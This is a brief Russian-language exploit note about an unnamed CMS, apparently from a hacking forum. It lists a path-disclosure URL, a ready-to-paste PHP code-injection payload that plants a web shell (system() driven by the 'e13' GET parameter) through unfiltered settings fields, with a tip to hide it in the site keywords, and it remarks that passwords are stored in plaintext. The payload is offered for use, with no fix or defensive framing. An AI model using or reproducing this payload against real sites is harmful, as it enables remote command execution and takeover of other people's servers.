1) Раскрытие установочного пути:
index.php?go=Search&modname=test&query=E1it3 team
2) Возможность закачать webshell. Поля настройки никак не фильтруются, вводим в любое поле:
";if ($_GET['e13']) {system($_GET['e13']);exit;}$test="
и получаем шелл по адресу
index.php?e13=команда
По словам автора лучше помещать в ключевые слова сайта, это конечно же разумно.
3) Пароли пишутся в открытом виде.